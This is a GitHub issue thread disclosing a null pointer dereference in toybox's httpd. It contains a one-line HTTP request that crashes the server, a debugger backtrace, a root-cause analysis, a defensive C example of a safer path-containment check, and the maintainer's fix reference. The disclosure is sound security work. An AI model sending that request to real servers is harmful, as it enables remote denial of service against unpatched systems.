Null pointer dereference in httpd.c #346

Closed
Taolaw opened this issue May 23, 2022 · 2 comments

Taolaw commented May 23, 2022

poc

GET /tar/tar.tar/.. HTTP/1.1\r\n\r\n

crash scene

pwndbg> bt
#0  strstart (a=a@entry=0x7fffffffdb58, b=b@entry=0x0) at lib/lib.c:506
#1  0x00005555555749f4 in isunder (dir=0x5555555bb7d4 ".", file=0x5555555cd535 "tar/tar.tar/..") at toys/net/httpd.c:86
#2  handle (infd=<optimized out>, outfd=1) at toys/net/httpd.c:132
#3  0x000055555556fcee in toy_exec_which (which=<optimized out>, argv=<optimized out>) at main.c:220
#4  0x000055555556fda1 in toybox_main () at main.c:246
#5  0x000055555556fcee in toy_exec_which (which=<optimized out>, argv=<optimized out>) at main.c:220
#6  0x000055555556fda1 in toybox_main () at main.c:246
#7  0x000055555556675f in main (argc=argc@entry=3, argv=argv@entry=0x7fffffffded8) at main.c:293
#8  0x00007ffff7c8cd90 in __libc_start_call_main (main=main@entry=0x555555566710 <main>, argc=argc@entry=3, argv=argv@entry=0x7fffffffded8) at ../sysdeps/nptl/libc_start_call_main.h:58
#9  0x00007ffff7c8ce40 in __libc_start_main_impl (main=0x555555566710 <main>, argc=3, argv=0x7fffffffded8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdec8) at ../csu/libc-start.c:392
#10 0x0000555555566795 in _start ()

Analyze

It seems that he did not handle the situation where the return value of xabspath is NULL, which leads to the subsequent dereference of this NULL. Tracing further leads to line 599 of xwrap.c: when the condition there is true, it returns NULL. I think this error is a code path that may not have been considered. But since it appears in the httpd remote service, it may cause a remote denial of service.

discoverer

Taolaw@Vlab Team of Vecentek
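
The failure mode in the report above, as an added example (not toybox's code and not the commit referenced in this thread): a path with ".." after a regular file fails to resolve, so a containment check has to test for NULL before the prefix match. It assumes POSIX realpath() as a stand-in for xabspath; is_under_checked, starts_with and make_fixture are hypothetical names and the fixture paths are constructed.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

/* Prefix match shaped like the strstart() frame in the backtrace: on success
 * advance *a past prefix b. It dereferences b, so b must never be NULL. */
static int starts_with(char **a, const char *b)
{
  char *c = *a;
  while (*b && *c == *b) b++, c++;
  if (*b) return 0;
  *a = c;
  return 1;
}

/* Hypothetical hardened check: 1 if file resolves at or below dir, else 0.
 * Assumption: realpath() stands in for the xabspath() named in the report. */
int is_under_checked(const char *dir, const char *file)
{
  char *d = realpath(dir, NULL), *f = realpath(file, NULL), *rest = f;
  /* NULL (ENOTDIR, ENOENT, ...) is rejected before the prefix match. */
  int ok = d && f && starts_with(&rest, d)
           && (!*rest || *rest == '/' || rest[-1] == '/');
  free(d);
  free(f);
  return ok;
}

/* Constructed fixture: temp dir (name stored in dir) holding a regular file
 * "tar.tar"; bad receives "<dir>/tar.tar/..". Returns 0 on success. */
int make_fixture(char *dir, size_t dlen, char *bad, size_t blen)
{
  FILE *fp;
  snprintf(dir, dlen, "/tmp/isunder-demo-XXXXXX");
  if (!mkdtemp(dir)) return -1;
  snprintf(bad, blen, "%s/tar.tar", dir);
  if (!(fp = fopen(bad, "w"))) return -1;
  fclose(fp);
  snprintf(bad, blen, "%s/tar.tar/..", dir);
  return 0;
}

int main(void)
{
  char dir[64], bad[PATH_MAX];
  if (make_fixture(dir, sizeof(dir), bad, sizeof(bad))) return 1;
  printf("under=%d\n", is_under_checked(dir, bad));
  return 0;
}
```

The fixture directory is left in /tmp after the run so the paths can be inspected.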

landley (Owner) commented May 29, 2022

Commit 6d48479

landley (Owner) commented Jun 9, 2022

I'm assuming in the absence of a reply that commit fixed it for you.

landley closed this as completed Jun 9, 2022